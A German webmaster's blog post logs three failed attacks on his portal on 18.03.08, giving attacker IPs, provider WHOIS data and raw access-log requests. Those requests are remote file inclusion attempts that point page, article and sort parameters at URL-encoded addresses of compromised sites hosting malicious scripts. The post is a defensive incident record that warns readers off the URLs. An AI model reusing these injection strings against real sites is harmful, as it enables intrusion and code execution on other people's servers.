Am 18.03.08 ging es dann weiter, die Amateure versuchten weiterhin erfolglos, mein Portal zu hacken.
Auch diesmal versuchten es einer über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der erste Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 222.255.3.68 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 222.255.0.0 - 222.255.3.255netname: VDC-NETcountry: vndescr: VietNam Data Communication CompanyHier das Protokoll:
18.03.08, 16:58:05, 222.255.3.68, /index.php?page=services/osData/php121/php121db.php?
php121dir=http://www.cdpm3.com/id.txt?
Der zweite Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 88.191.26.64 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 88.191.3.0 - 88.191.248.255netname: FR-DEDIBOXdescr: Dedibox SASdescr: Customersdescr: Paris, FranceHier das Protokoll, der hat sich ja richtig Mühe gegeben aber das tut ein blindes Huhn ja auch:
18.03.08, 21:34:20, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.agv-schaafheim.de%2F
gallery%2Fdata%2Fmedia%2Fnexa%2Fzevela%2F
18.03.08, 21:34:22, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b
%2Fpages%2Fgodot%2Feridehi%2F
18.03.08, 21:34:23, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.polisgrandhotel.gr%2F
_cm_admin%2Fmaillist%2Feditor%2Fplugins%2Fcore%2Fdialogs%2Fqunik%2Futanac%2F
18.03.08, 21:34:35, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
fabcraft.co.uk%2Fforum%2Fugak%2Fmiketat%2F
18.03.08, 21:34:36, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
tcmforum.com%2Fweb%2Fsal%2Fyuveli%2F
18.03.08, 21:34:37, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=articles
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fsites.
redskycreative.com%2Fcanyonlakechurch%2Fjolalu%2Fbuq%2F
18.03.08, 21:34:40, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
soeasywebsite.com%2Fsoeasycasino%2Fenosucu%2Fijani%2F
18.03.08, 21:34:41, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fotitob%2F
18.03.08, 21:34:42, 88.191.26.64, /index.php?page=privacy
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=http%3A%2F%2Fctot.ru%2Fsts%2Fst22.files%2Fcusipu
%2Fhidola%2Fapa%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.planet-
pictures.de%2Fcontent_system%2Fola%2Fitil%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fhonamfishing.co.kr
%2Fphpmysqladmin%2Flibraries%2Fnov%2Fwulosu%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.marsbook.co.kr
%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F
18.03.08, 21:34:47, 88.191.26.64, /index.php?page=terms_of_use
18.03.08, 21:34:48, 88.191.26.64, /index.php?page=showarticle&articleid=1
18.03.08, 21:34:48, 88.191.26.64, /?orderby=gender&sortorder=asc
18.03.08, 21:34:49, 88.191.26.64, /?orderby=sincedate&sortorder=asc
Der dritte Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 209.62.86.4 seine Spur hinterlies, kam über folgenden Provider:
OrgName: ThePlanet.com Internet Services, Inc.OrgID: TPCMAddress: 315 CapitolAddress: Suite 205City: HoustonNetRange: 209.62.0.0 - 209.62.127.255
Hier das Protokoll, frei nach dem Motto "und mühsam ernährt sich das Eichörnchen":18.03.08, 22:27:03, 209.62.86.4, /index.php?page=http%3A%2F%2F
www.sanyoclim.fr%2Fextension%2Fezodf%2Fedidu%2Feyep%2F
18.03.08, 22:27:05, 209.62.86.4, /index.php?page=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2F
pic%2Fhuv%2Fabey%2F
18.03.08, 22:27:06, 209.62.86.4, /index.php?page=http%3A%2F%2Fwww.zetesis.biz%2FLMR%2Fade
%2Fzupe%2F
18.03.08, 22:27:08, 209.62.86.4, /index.php?page=shownews&newsid=
http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fenosucu
%2Fijani%2F
18.03.08, 22:27:10, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.blankner
.ocps.net%2Fmedia%2Fimages%2Fefepi%2Fasopuy%2F
18.03.08, 22:27:11, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fchyngachanga
.ru%2Fcontent%2Fwuge%2Fasagula%2F
18.03.08, 22:27:16, 209.62.86.4, /index.php?page=login
18.03.08, 22:27:18, 209.62.86.4, /index.php?page=shownews&newsid=6
18.03.08, 22:27:23, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2F
MType%2Farchives%2Fajuq%2Fpiy%2F&sortorder=asc
18.03.08, 22:27:25, 209.62.86.4, /?orderby=http%3A%2F%2Fsites.redskycreative.com%2Fcanyonlakechurch
%2Fjolalu%2Fbuq%2F&sortorder=asc
18.03.08, 22:27:26, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.snowmobile.ro%2Fphoto%2Fproduct%2F
_ugohoj%2Ferisa%2Fodiy%2Fwifefef%2F&sortorder=asc
18.03.08, 22:27:28, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Figodoq%2Fbukosud%2F
18.03.08, 22:27:30, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.antwerpsupporter
.be%2Fsubscribe_2_me_to-delete%2Fsm%2Fexported_files1%2
Fmosupoz%2Fadusa%2Fojafujo%2Faweji%2F
18.03.08, 22:27:31, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.lamarguerite.ca%2F
Pat%2Fimages%2Fawixeta%2Fveb%2F
18.03.08, 22:27:33, 209.62.86.4, /index.php?page=terms_of_use
18.03.08, 22:27:42, 209.62.86.4, /?orderby=city&sortorder=asc
18.03.08, 22:27:44, 209.62.86.4, /?orderby=country&sortorder=asc
Auch für diesen Tag gilt, planloses Starten von irgendwelchen Tools, wo diese Dilettanten gar nicht so recht wissen, was sie da eigentlich tun. Schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster